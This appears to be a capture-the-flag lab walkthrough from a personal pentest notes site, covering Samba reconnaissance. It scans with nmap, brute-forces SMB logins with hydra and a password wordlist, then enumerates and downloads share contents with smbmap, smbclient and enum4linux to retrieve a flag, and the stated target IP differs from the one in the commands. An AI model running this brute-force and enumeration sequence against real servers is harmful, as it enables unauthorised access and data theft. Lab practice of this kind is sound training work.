Home BlogGitHubBuy Me a Book

🔬SAMBA

Lab 1

🔬 Samba Recon: Dictionary Attack

  • Target IP: 192.174.58.3

  • Brute-force of SAMBA service

  • Enumeration, brute-force, tools and flags have been already covered in this SMB Enum Lab 6

Enumeration

ip -br -c a

nmap -sV 192.34.128.3
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)

📌 Server is running SAMBA on the standard port 445

Brute-Force

gzip -d /usr/share/wordlists/rockyou.txt.gz
hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.34.128.3 smb
[445][smb] host: 192.34.128.3   login: admin   password: password1

Login and Enumeration

  • Use SMBMap tool

smbmap -H 192.34.128.3 -u admin -p password1
Disk  Permissions
----  -----------
shawn  READ, WRITE
nancy  READ ONLY
admin  READ, WRITE
IPC$   NO ACCESS

  • Use smbclient tool to access Samba sources

smbclient -L 192.34.128.3 -U admin
smbclient //192.34.128.3/shawn -U admin
help
dir
# check files and folders in that share
smbclient //192.34.128.3/nancy -U admin
cd dir\
get flag
exit
smbclient //192.34.128.3/admin -U admin
cd hidden
get flag.tar.gz
exit
tar xzf flag.tar.gz
cat flag

  • Use enum4linuxtool

enum4linux -a 192.34.128.3
# a = enumerate all information
enum4linux -a -u admin -p password1 192.34.128.3
Reveal Flag: 🚩

2727069bc058053bd561ce372721c92e

Previous🔬SSHNext🔬Cron Jobs

Last updated